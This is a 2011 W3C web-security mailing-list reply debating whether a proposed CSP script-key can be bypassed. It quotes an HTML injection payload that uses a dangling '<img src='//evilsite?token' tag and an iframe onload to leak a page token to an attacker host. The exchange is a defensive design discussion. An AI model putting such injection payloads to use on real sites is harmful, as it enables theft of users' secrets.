- From: Gervase Markham <gerv@mozilla.org>
- Date: Fri, 28 Jan 2011 11:04:10 +0000
- To: gaz Heyes <gazheyes@gmail.com>
- CC: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28/01/11 10:54, gaz Heyes wrote:
> You want an automatic attack? Ok. I'm really clueless as to why you don't
> get this. I said there are many ways. <img src='//evilsite?token please=
> Initiated by a <iframe src="//cspsite?injection=<img
> src='//evilsite?token please=" onload="setTimeout(function(){
> readKey();doJSInjection(); }, 10000)"></iframe>

Still don't get it, sorry :-(

If you inject the <img src= etc. into the CSP site using script-key, your onload won't run because it doesn't have the script-key in the script text. You need the key to run any script in the page context. _Any_ script - event handlers, in-page, external.

Apart from your suggestion of managing to get a form submitted with a chunk of page HTML in the form data, then you need script to get the key. Catch 22.

Gerv
Received on Friday, 28 January 2011 11:04:49 UTC